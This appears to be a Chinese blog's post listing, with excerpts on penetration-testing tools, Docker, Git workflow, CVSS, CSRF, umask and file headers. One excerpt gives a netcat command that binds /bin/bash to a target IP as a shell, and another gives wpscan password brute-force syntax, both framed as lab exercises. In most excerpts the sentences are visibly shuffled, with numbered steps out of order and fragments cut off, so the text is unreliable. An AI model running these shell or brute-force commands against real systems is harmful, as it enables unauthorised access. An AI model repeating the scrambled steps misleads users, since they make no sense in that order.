2301_78006725的博客

先burp上拦截登录请求，然后点击登录。选择需要爆破的系统，随便输入账号密码。登录之后返回burp查看拦截请求信息。开启代理（浏览器和burp需一致）

此报错是因为配置源出现了问题，需要修改配置源，或者删除不好使的配置源信息。然后重启docker。

cewl是一个ruby应用，爬行指定url的指定深度。也可以跟一个外部链接，结果会返回一个单词列表，这个列表可以扔到wpscan等密码爆破工具里进行密码破解。语法：cewl <url> [options] <保存于哪个目录>cewl工具爬取目标网站信息，生成相对应的字典。二、cewl的简单使用方法。将爬取到的内容在下行显示。

4、WordPress是全球流行的博客网站，许多外国的博客都是用它搭建的，但是存在着很多漏洞，专注于这些漏洞与其特性，一个专门针对该CMS的WPScan工具出现了。3、WordPress是全球流行的博客网站，全球有上百万人使用它来搭建博客。wpscan --url [url] -U [用户名字典路径] -P [密码字典路径]服务器评估工具，我们认为这个工具应该成为所有针对。漏洞的黑盒子扫描器，它可以为所有。二、wpscan工具的简单使用。网站进行的渗透测试的一部分。一、什么是wpscan。

nc -e /bin/bash [靶机ip] [靶机监听端口]反弹成功后需要将反弹shell升级为交互shell。nc -lvvp [任意未占用的端口号]一、反弹shell（NC正向反弹）2、攻击机将shell弹到靶机上。1、靶机开启监听端口。

Compose 通过一个配置文件来管理多个Docker容器，在配置文件中，所有的容器通过services来定义，然后使用docker-compose脚本来启动，停止和重启应用，和应用中的服务以及所有依赖服务的容器，适合组合使用多个容器进行开发的场景。一个使用Docker容器的应用，通常由多个容器组成。Docker Compose是一个用来定义和运行复杂应用的Docker工具。注：环境中需要有docker，若没有，请参考链接安装docker。二、安装docker-compose。

如果修复期间，有其他版本合并入master ，需要同步到fixbug版本，并进行测试。由于当前版本迭代较快，开发分支只提供拉取，不进行实际开发。一般开发的新功能时，feature分支都是基于develop分支下创建的。所有用户可见的正式版本，都从master发布（也是用于部署生产环境的分支，确保master分支稳定性）master 分支一般由develop以及hotfix分支合并，任何时间都不能直接修改代码。release 为预上线分支，发布提测阶段，会release分支代码为基准提测。

CMD java -jar ds_web.jar #定义容器启动执行的命令 app.jar的名字可自取。docker run -id -p 主机端口号：容器端口号 --name=容器名字 镜像（ds_web）ADD *.jar ds_web.jar #将jar包添加到容器。FROM centos #定义镜像，不能有大写。五、最后，查看所有容器，查看正在运行的容器。一、将要创建容器的jar包上传至服务器中。三、使用dockerfile文件构建镜像。二、创建dockerfile文件。

持续交付是一系列的开发实践方法，用来确保让代码能够快速安全的部署到产品环境中，它通过将每一次改动都提交到一个模拟产品环境中，使用严格的自动化测试，确保业务应用和服务能符合预期。Travis CI是一个基于云的CI/CD服务，可以轻松地集成Github等平台。像其他CI/CD工具一样，Travis CI提供了一个可配置的工作流程，以便团队自定义它们的构建流程。持续部署是基于某种工具或平台实现代码自动化的构建、测试和部署到线上环境以实现交付高质量的产品,持续部署在某种程度上代表了一个开发团队的更新迭代速率。

可以理解为包含所有的功能的环境，任何项目所使用的环境都以这个为基础，然后根据客户的个性化需求来做调整或者修改。顾名思义是和真正使用的环境一样的环境（即已经出售给客户的系统所在环境，也成为商用环境），所有的配置，页面展示等都应该和商家正在使用的一样，差别只在环境的性能方面。开发环境是程序猿们专门用于开发的服务器，配置可以比较随意， 为了开发调试方便，一般打开全部错误报告。测试环境，外部用户无法访问，专门给测试人员使用的，版本相对稳定。开发环境，外部用户无法访问，开发人员使用，版本变动很大。

是由FIRST（Forum of Incident Response and Security Teams）提出的漏洞严重性评分算法，现在已成为ITU-T（b-ITU-T X.1521）和NIST（NISTIR 7435）的推荐标准，被广泛应用于软件安全、漏洞管理等领域，受到eBay、(Symantec)、思科(Cisco)、甲古文(Oracle)等众多厂商支援。用于计算基准评分，主要从漏洞的内在特性（不会随时间的推移或环境的改变而变化），来评价漏洞的严重性。

不固定型： 或者称作“十分有针对性”，因为每一种逻辑缺陷似乎都是唯一的，它是基于逻辑操作，不同的功能逻辑不同，因此无法用一般的工具发现他们。逻辑漏洞：又称业务逻辑漏洞，是指由于程序逻辑不严谨或者 逻辑太复杂，导致一些逻辑分支不能正常处理或 者处理错误。通俗的讲，一个系统功能太多后，程序开发人员难以顾及到方方面面，对于某些地方的处理可能有遗漏， 从而导致逻辑漏洞。普遍存在性： 由于功能的实现需要大量的逻辑操作，同时受制于程序员的背景，这类缺陷普遍存在于各类应用程序中。三、常见的逻辑漏洞类型。

Dockerfile是一个创建镜像所有命令的文本文件，包含了一条条指令和说明，每条指令构建一层, 通过docker build命令，根据Dockerfile的内容构建镜像,因此每一条指令的内容, 就是描述该层如何构建。有了Dockefile，就可以制定自己的docker镜像规则，只需要在Dockerfile上添加或者修改指令，就可生成docker 镜像。3、dockerfile由多条指令构成，Dockerfile中的每一条指令都会对应于Docker镜像中的每一层。二、dockerfile的核心作用。

国家信息安全漏洞库（China National Vulnerability Database of Information Security）：是中国信息安全测评中心（中文简称：国测，英文简称：CNITSEC，China Information Technology Security Evaluation Center）为切实履行 漏洞分析 和 风险评估 的职能，负责建设运维的国家信息安全漏洞库，面向国家、行业和公众提供灵活多样的信息安全数据服务，为我国信息安全保障提供基础服务。

->导出：页面乃至整个空间可以导出为 HTML，PDF，XML 文件；-->通知：通过 mail/RSS 来跟踪页面的内容变更；-->安全：高级的权限和安全性，权限控制非常合理、方便；-->定制：颜色，风格，整个站点的布局都可以定制；-->开放的 API 接口，灵活扩展和集成；-->搜索：跨页面，注释和附件间的搜索；-->组织：高效地创建灵活的页面结构；-->重获：容易找到你需要的信息；-->PDF 导出和自动的重构；-->简洁，友好的用户界面；-->强大的构造和搜索功能；-->重构：高效的信息操作；

C/S——客户端/服务器结构（Client/Server），C/S结构在技术上很成熟，它的主要特点是交互性强、具有安全的存取模式、网络通信量低、响应速度快、利于处理大量数据。C/S结构的软件需要针对不同的操作系统系统开发不同版本的软件，加之产品的更新换代十分快，已经很难适应百台电脑以上局域网用户同时使用。B/S——浏览器/服务器结构（Browser/Server），是目前应用系统的发展方向，在这种结构下，通过浏览器来进入工作界面，极少部分事务逻辑在前端实现，主要事务逻辑在服务器端实现，形成三层结构。

k8s 本质上就是用来简化微服务的开发和部署的，关注点包括自愈和自动伸缩、调度和发布、调用链监控、配置管理、Metrics 监控、日志监控、弹性和容错、API 管理、服务安全等，k8s 将这些微服务的公共关注点以组件形式封装打包到 k8s 这个大平台中，让开发人员在开发微服务时专注于业务逻辑的实现，而不需要去特别关系微服务底层的这些公共关注点，大大简化了微服务应用的开发和部署，提高了开发效率。K8S用于容器化应用程序的部署，扩展和管理；4. 容器化的应用可以在不同的云服务商、不同的Linux系统进行部署。

用户每次注册进入系统时，umask命令都被执行， 并自动设置掩码来限制新文件的权限。用户可以通过再次执行umask命令来改变默认值，新的权限将会把旧的覆盖掉。第四位的2，表示【其他用户权限】，从其他用户权限减2，取消其他用户的“写（w=2）”权限。作用：umask命令用来控制权限掩码，为新建的文件或目录设置一个。第三位的2，表示【用户组权限】，从组权限减2，减掉“写（w=2）”的权限.文件/目录创建时的初始权限 = 默认权限 - 权限掩码。第二位的0，表示【用户权限】，从用户权限减0，权限不变。

攻击者通过欺骗用户点击恶意链接或者访问恶意网站，在用户已经登录了目标网站的情况下，发送伪造的请求来执行攻击。如果在cookie存在期间，通过构造csrf脚本或包含csrf脚本的链接发送给用户，得到信息后，再伪造成用户身份，执行相关操作。攻击者利用网站对请求的验证漏洞而实现这样的攻击行为，网站能够确认请求来源于用户的浏览器，却不能验证请求是否源于用户的真实意愿下的操作行为。用户浏览器在网站A上执行相关操作（以已经持有的cookie）网站F收到用户请求后，返回恶意代码给用户，强制他访问网站A。

当文件没有后缀名或者有后缀名而无法正常打开时，根据识别出的文件类型来修改后缀名即可正常打开文件。和上面的文件头类型图对比，就可以分辨出文件类型了（注：对比十六进制开头的几个）通过winhex程序中可以查看文件头类型，根据文件头类型判断出文件类型。使用场景：Windows下通过文件头信息判断文件类型。然后按照查询出的格式修改文件格式就可以了。使用场景：不知道后缀名，无法打开文件。格式：file + 文件名。